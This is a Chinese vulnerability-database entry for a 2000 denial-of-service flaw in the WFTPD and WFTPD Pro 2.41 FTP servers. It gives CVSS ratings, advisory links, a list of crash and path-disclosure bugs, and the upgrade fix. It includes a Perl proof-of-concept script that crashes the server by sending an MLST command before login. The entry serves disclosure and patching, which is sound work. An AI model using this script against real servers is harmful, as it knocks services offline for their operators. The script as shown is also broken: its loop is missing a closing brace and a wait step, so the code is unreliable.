发布时间 :2000-07-21 00:00:00
修订时间 :2008-09-10 15:05:32

[原文]WFTPD and WFTPD Pro 2.41 allows remote attackers to cause a denial of service by executing an MLST command before logging into the server.

[CNNVD]WFTPD 2.4.1RC11多个漏洞(CNNVD-200007-061)

        WFTPD和WFTPD Pro 2.41版本存在漏洞。远程攻击者通过在登录到服务器之前执行MLST命令导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000721 WFTPD/WFTPD Pro 2.41 RC11 vulnerabilities.

- 漏洞信息

WFTPD 2.4.1RC11多个漏洞
中危 输入验证
2000-07-21 00:00:00 2005-10-20 00:00:00
        WFTPD和WFTPD Pro 2.41版本存在漏洞。远程攻击者通过在登录到服务器之前执行MLST命令导致服务拒绝。

- 公告与补丁

        Update to WFTPD 2.4.1RC12

- 漏洞信息 (20102)

WFTPD 2.4.1RC11 Unauthenticated MLST Command Remote DoS (EDBID:20102)
windows dos
2000-07-21 Verified
0 Blue Panda
N/A [点击下载]
WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.
1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #3
# Blue Panda -
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
# Sends an MLST command without logging in with USER and PASS first, causing
# WFTPD to crash. Note: MLST is not enabled by default, and must be for this
# to work.

use IO::Socket;

$host = "" ;
$port = "21";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

print $socket "MLST a\n";

# Wait a while, just to make sure the command arrives.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        print ".";
        $time += 1;

# Finished.
print "\nConnection closed. Finished.\n"

- 漏洞信息

Windows NT FTP Server (WFTP) Unauthenticated MLST Command Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-07-21 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.4.1RC12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete